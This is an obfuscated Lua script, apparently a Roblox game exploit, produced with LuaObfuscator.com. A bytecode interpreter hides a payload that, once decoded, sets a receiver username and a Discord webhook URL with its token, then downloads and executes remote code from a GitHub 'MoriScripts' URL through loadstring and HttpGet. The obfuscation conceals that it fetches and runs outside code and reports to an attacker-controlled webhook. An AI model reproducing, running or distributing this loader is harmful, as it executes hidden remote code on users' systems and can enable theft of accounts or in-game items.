--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32,v33=v1(v16,v19,v19 + (5 -3) );v19=v19 + (5 -3) ;return (v33 * (493 -237)) + v32 ;end v18=3;end if (v18==4) then function v25()local v34=v24();local v35=v24();local v36=2 -1 ;local v37=(v21(v35,620 -(555 + (83 -19)) ,951 -(857 + 74) ) * ((570 -((651 -284) + 201))^(959 -(214 + 713)))) + v34 ;local v38=v21(v35,6 + 15 ,(1243 -(1069 + 118)) -25 );local v39=((v21(v35,6 + 26 )==1) and  -(878 -(282 + 595))) or (1638 -(1523 + 114)) ;if (v38==(0 + 0 + 0)) then if (v37==((791 -(368 + 423)) -0)) then return v39 * (0 -0) ;else local v78=1065 -(68 + 997) ;while true do if (v78==(1270 -(226 + (3280 -2236)))) then v38=(6 -3) -2 ;v36=952 -(802 + 150) ;break;end end end elseif (v38==(8913 -6866)) then return ((v37==((255 -138) -(32 + 85))) and (v39 * (((1 + 0) -(18 -(10 + 8)))/(0 + 0)))) or (v39 * NaN) ;end return v8(v39,v38-(2020 -(915 + (315 -233))) ) * (v36 + (v37/((1 + 1)^(31 + 21)))) ;end v26=nil;function v26(v40)local v41=(1214 -(201 + 571)) -(416 + 26) ;local v42;local v43;while true do if (0==v41) then v42=nil;if  not v40 then v40=v24();if (v40==(0 -(0 + 0))) then return "";end end v41=1;end if (((1139 -(116 + 1022)) + 1)==v41) then v43={};for v79=(4 -3) -0 , #v42 do v43[v79]=v2(v1(v3(v42,v79,v79)));end v41=2 + 1 ;end if (v41==(441 -(145 + (1069 -776)))) then return v6(v43);end if (v41==(431 -(44 + 386))) then v42=v3(v16,v19,(v19 + v40) -(1487 -(998 + 488)) );v19=v19 + v40 ;v41=1 + 1 ;end end end v18=5;end if (v18==6) then v29=nil;function v29()local v44=0;local v45;local v46;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v44==(781 -(507 + 271))) then v51=nil;v52=nil;v44=11 -7 ;end if (1~=v44) then else local v73=0;while true do if (v73==(1901 -(106 + 1794))) then v44=2;break;end if (v73==0) then v47=nil;v48=nil;v73=1;end end end if (v44==(1 + 1)) then local v74=0 + 0 ;while true do if (v74==(2 -1)) then v44=7 -4 ;break;end if (v74==0) then v49=nil;v50=nil;v74=115 -(4 + 110) ;end end end if ((584 -(57 + 527))==v44) then v45=0;v46=nil;v44=1;end if (v44==4) then while true do if (v45==(1430 -(41 + 1386))) then v52=nil;while true do local v103=0;local v104;while true do if (v103~=(103 -(17 + 86))) then else v104=0 + 0 ;while true do if (v104~=0) then else if (v46==1) then local v138=0;local v139;local v140;while true do if ((1 -0)==v138) then while true do if (v139==0) then v140=0;while true do if (v140==(0 -0)) then local v170=166 -(122 + 44) ;local v171;while true do if (v170~=(0 -0)) then else v171=0;while true do if ((0 -0)==v171) then local v180=0 + 0 ;while true do if (v180==(0 + 0)) then v51=v24();v52={};v180=1 -0 ;end if (v180~=(66 -(30 + 35))) then else v171=1 + 0 ;break;end end end if (v171~=1) then else v140=1258 -(1043 + 214) ;break;end end break;end end end if (v140~=2) then else v46=7 -5 ;break;end if (v140==(1213 -(323 + 889))) then local v172=0 -0 ;while true do if (v172==(581 -(361 + 219))) then v140=2;break;end if (v172~=0) then else for v176=321 -(53 + 267) ,v51 do local v177=0 + 0 ;local v178;local v179;while true do if (0==v177) then local v182=0;while true do if (v182~=0) then else v178=v22();v179=nil;v182=414 -(15 + 398) ;end if (v182~=(983 -(18 + 964))) then else v177=1;break;end end end if ((3 -2)~=v177) then else if (v178==1) then v179=v22()~=(0 + 0) ;elseif (v178==2) then v179=v25();elseif (v178~=(2 + 1)) then else v179=v26();end v52[v176]=v179;break;end end end v50[3]=v22();v172=1;end end end end break;end end break;end if (v138==(850 -(20 + 830))) then v139=0 + 0 ;v140=nil;v138=127 -(116 + 10) ;end end end if (v46~=0) then else local v141=0;local v142;while true do if ((0 + 0)~=v141) then else v142=0;while true do if (2~=v142) then else v46=739 -(542 + 196) ;break;end if (v142==0) then local v168=0 -0 ;while true do if (v168==1) then v142=1 + 0 ;break;end if (v168==(0 + 0)) then v47={};v48={};v168=1;end end end if (v142~=1) then else local v169=0;while true do if (v169==0) then v49={};v50={v47,v48,nil,v49};v169=2 -1 ;end if (v169~=1) then else v142=1553 -(1126 + 425) ;break;end end end end break;end end end v104=406 -(118 + 287) ;end if (v104==1) then if (v46==2) then local v143=0 -0 ;local v144;while true do if (v143==(1121 -(118 + 1003))) then v144=0 -0 ;while true do local v167=377 -(142 + 235) ;while true do if (v167==0) then if (v144==0) then local v173=0 -0 ;local v174;while true do if ((0 + 0)==v173) then v174=977 -(553 + 424) ;while true do if (v174==(1 -0)) then v144=1;break;end if ((0 + 0)==v174) then local v181=0 + 0 ;while true do if (v181==(0 + 0)) then for v184=1,v24() do local v185=0;local v186;local v187;local v188;while true do if ((1 + 0)~=v185) then else v188=nil;while true do if ((1 + 0)==v186) then while true do if (v187==0) then v188=v22();if (v21(v188,1,2 -1 )~=0) then else local v193=0;local v194;local v195;local v196;local v197;local v198;while true do if (1==v193) then v196=nil;v197=nil;v193=2;end if ((0 -0)~=v193) then else v194=0 -0 ;v195=nil;v193=1;end if (v193~=2) then else v198=nil;while true do if (v194~=0) then else local v200=0 + 0 ;local v201;while true do if (v200==(0 -0)) then v201=0;while true do if (v201==1) then v194=754 -(239 + 514) ;break;end if (v201==(0 + 0)) then local v211=1329 -(797 + 532) ;while true do if (v211==(0 + 0)) then v195=0;v196=nil;v211=1 + 0 ;end if (v211==(2 -1)) then v201=1203 -(373 + 829) ;break;end end end end break;end end end if (v194==1) then local v202=731 -(476 + 255) ;while true do if (v202==0) then v197=nil;v198=nil;v202=1;end if ((1131 -(369 + 761))==v202) then v194=2 + 0 ;break;end end end if (v194==(2 -0)) then while true do if (v195==(5 -2)) then if (v21(v197,241 -(64 + 174) ,1 + 2 )~=(1 -0)) then else v198[340 -(144 + 192) ]=v52[v198[220 -(42 + 174) ]];end v47[v184]=v198;break;end if (v195~=0) then else local v204=0 + 0 ;local v205;while true do if (v204~=0) then else v205=0 + 0 ;while true do if (v205==(0 + 0)) then v196=v21(v188,1506 -(363 + 1141) ,1583 -(1183 + 397) );v197=v21(v188,11 -7 ,6);v205=1;end if (v205==(1 + 0)) then v195=1;break;end end break;end end end if (v195~=(2 + 0)) then else local v206=1975 -(1913 + 62) ;while true do if (v206~=0) then else local v212=0;local v213;while true do if (v212==0) then v213=0;while true do if (v213==(0 + 0)) then if (v21(v197,1,2 -1 )==(1934 -(565 + 1368))) then v198[7 -5 ]=v52[v198[1663 -(1477 + 184) ]];end if (v21(v197,2,2 -0 )==(1 + 0)) then v198[859 -(564 + 292) ]=v52[v198[3]];end v213=1 -0 ;end if (v213==1) then v206=1;break;end end break;end end end if ((2 -1)~=v206) then else v195=3;break;end end end if (v195==(305 -(244 + 60))) then local v207=0;local v208;while true do if ((0 + 0)==v207) then v208=0;while true do if (v208~=(476 -(41 + 435))) then else local v214=1001 -(938 + 63) ;local v215;while true do if ((0 + 0)~=v214) then else v215=1125 -(936 + 189) ;while true do if (v215==1) then v208=1 + 0 ;break;end if (v215==(1613 -(1565 + 48))) then v198={v23(),v23(),nil,nil};if (v196==0) then local v220=0;local v221;while true do if (v220==(0 -0)) then v221=1092 -(975 + 117) ;while true do if (v221~=(1875 -(157 + 1718))) then else v198[3 + 0 ]=v23();v198[14 -10 ]=v23();break;end end break;end end elseif (v196==1) then v198[3]=v24();elseif (v196==(6 -4)) then v198[1021 -(697 + 321) ]=v24() -((5 -3)^(33 -17)) ;elseif (v196~=(6 -3)) then else local v226=0 + 0 ;while true do if (v226==(0 -0)) then v198[7 -4 ]=v24() -(2^(1243 -(322 + 905))) ;v198[615 -(602 + 9) ]=v23();break;end end end v215=1190 -(449 + 740) ;end end break;end end end if (v208~=(873 -(826 + 46))) then else v195=2;break;end end break;end end end end break;end end break;end end end break;end end break;end if (v186~=(947 -(245 + 702))) then else local v191=0;local v192;while true do if (v191~=(0 -0)) then else v192=0;while true do if (v192==0) then local v199=0;while true do if (v199==1) then v192=1;break;end if (v199~=0) then else v187=0 + 0 ;v188=nil;v199=1;end end end if (v192==(1899 -(260 + 1638))) then v186=441 -(382 + 58) ;break;end end break;end end end end break;end if (v185~=(0 -0)) then else v186=0;v187=nil;v185=1;end end end for v189=1 + 0 ,v24() do v48[v189-(1 -0) ]=v29();end v181=2 -1 ;end if (v181~=1) then else v174=1206 -(902 + 303) ;break;end end end end break;end end end if (v144==(1 -0)) then return v50;end break;end end end break;end end end break;end end break;end end end break;end if (v45~=0) then else local v100=0;local v101;while true do if (v100~=(0 -0)) then else v101=0 + 0 ;while true do if (1==v101) then v45=1691 -(1121 + 569) ;break;end if (0==v101) then local v110=0;while true do if (v110~=(215 -(22 + 192))) then else v101=684 -(483 + 200) ;break;end if (v110~=0) then else v46=1463 -(1404 + 59) ;v47=nil;v110=1;end end end end break;end end end if (v45==(2 -1)) then local v102=0 -0 ;while true do if (v102==(766 -(468 + 297))) then v45=2;break;end if (v102==(562 -(334 + 228))) then local v109=0;while true do if (1~=v109) then else v102=3 -2 ;break;end if (v109==(0 -0)) then v48=nil;v49=nil;v109=1;end end end end end if (v45==2) then v50=nil;v51=nil;v45=3;end end break;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v53)if (v1(v53,2)==79) then v20=v0(v3(v53,1,1));return "";else local v69=v2(v0(v53,16));if v20 then local v81=0;local v82;while true do if (v81==1) then return v82;end if (v81==0) then v82=v5(v69,v20);v20=nil;v81=1;end end else return v69;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v54=0 -0 ;local v55;local v56;local v57;local v58;while true do if (v54==(1 + 0 + 0)) then return (v58 * (16777452 -(141 + 95))) + (v57 * (64377 + 1159)) + (v56 * (658 -402)) + v55 ;end if ((0 -0)==v54) then v55,v56,v57,v58=v1(v16,v19,v19 + 1 + 2 );v19=v19 + (10 -(8 -2)) ;v54=1 + 0 ;end end end v25=nil;v18=4;end if (v18==7) then function v30(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (v62==1) then v65=v59[3];return function(...)local v83=v63;local v84=v64;local v85=v65;local v86=v28;local v87=1;local v88= -1;local v89={};local v90={...};local v91=v12("#",...) -1 ;local v92={};local v93={};for v97=0,v91 do if (v97>=v85) then v89[v97-v85 ]=v90[v97 + 1 ];else v93[v97]=v90[v97 + 1 ];end end local v94=(v91-v85) + 1 ;local v95;local v96;while true do v95=v83[v87];v96=v95[1];if (v96<=9) then if (v96<=4) then if (v96<=1) then if (v96>0) then do return;end else v93[v95[2]]=v95[3];end elseif (v96<=2) then v93[v95[2]]=v95[3]~=0 ;elseif (v96==3) then v93[v95[2]]=v95[3];else local v147=v95[2];v93[v147]=v93[v147](v13(v93,v147 + 1 ,v88));end elseif (v96<=6) then if (v96>5) then local v114=v95[2];local v115,v116=v86(v93[v114](v13(v93,v114 + 1 ,v95[3])));v88=(v116 + v114) -1 ;local v117=0;for v132=v114,v88 do v117=v117 + 1 ;v93[v132]=v115[v117];end else v61[v95[3]]=v93[v95[2]];end elseif (v96<=7) then v93[v95[2]]=v95[3]~=0 ;elseif (v96>8) then v93[v95[2]]();else v93[v95[2]]=v61[v95[3]];end elseif (v96<=14) then if (v96<=11) then if (v96>10) then v93[v95[2]]=v61[v95[3]];else local v123=v95[2];local v124,v125=v86(v93[v123](v13(v93,v123 + 1 ,v95[3])));v88=(v125 + v123) -1 ;local v126=0;for v135=v123,v88 do v126=v126 + 1 ;v93[v135]=v124[v126];end end elseif (v96<=12) then local v127=v95[2];v93[v127]=v93[v127](v13(v93,v127 + 1 ,v88));elseif (v96==13) then v93[v95[2]][v95[3]]=v95[4];else v93[v95[2]][v95[3]]=v95[4];end elseif (v96<=16) then if (v96==15) then do return;end else local v129=0;local v130;local v131;while true do if (v129==0) then v130=v95[2];v131=v93[v95[3]];v129=1;end if (v129==1) then v93[v130 + 1 ]=v131;v93[v130]=v131[v95[4]];break;end end end elseif (v96<=17) then v93[v95[2]]();elseif (v96>18) then local v155=v95[2];local v156=v93[v95[3]];v93[v155 + 1 ]=v156;v93[v155]=v156[v95[4]];else v61[v95[3]]=v93[v95[2]];end v87=v87 + 1 ;end end;end if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v66,v67,v68)if v68 then local v70=0 + 0 ;local v71;while true do if (v70==(163 -(92 + 71))) then v71=(v66/((1 + 1)^(v67-(1 -(0 -0)))))%((767 -(574 + 191))^(((v68-1) -(v67-((1791 -(573 + 1217)) + 0))) + (2 -1))) ;return v71-(v71%(1 + 0)) ;end end else local v72=(851 -((703 -449) + 595))^(v67-(127 -(55 + 71))) ;return (((v66%(v72 + v72))>=v72) and 1) or 0 ;end end v22=nil;v18=2;end end end v15("LOL!0E3O0003083O00557365724E616D6503063O0076686F6E656203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3133363433393038343934393138303437382F3870454B7054376238324E7645714475302D5371396133477948797065786576745375724E667935494F73516E6C4B4265354A326A7A3955632D692D5739376A77764C5503093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O00124O00023O002O123O00013O00124O00043O002O123O00033O00124O00023O002O123O00053O00120B3O00063O00300D3O0007000800120B3O00063O00300D3O0009000800120B3O00063O00300D3O000A000800120B3O000B3O00120B0001000C3O00201300010001000D00122O0003000E4O0007000400014O0006000100044O000C5O00022O00093O000100012O00013O00017O00",v9(),...);
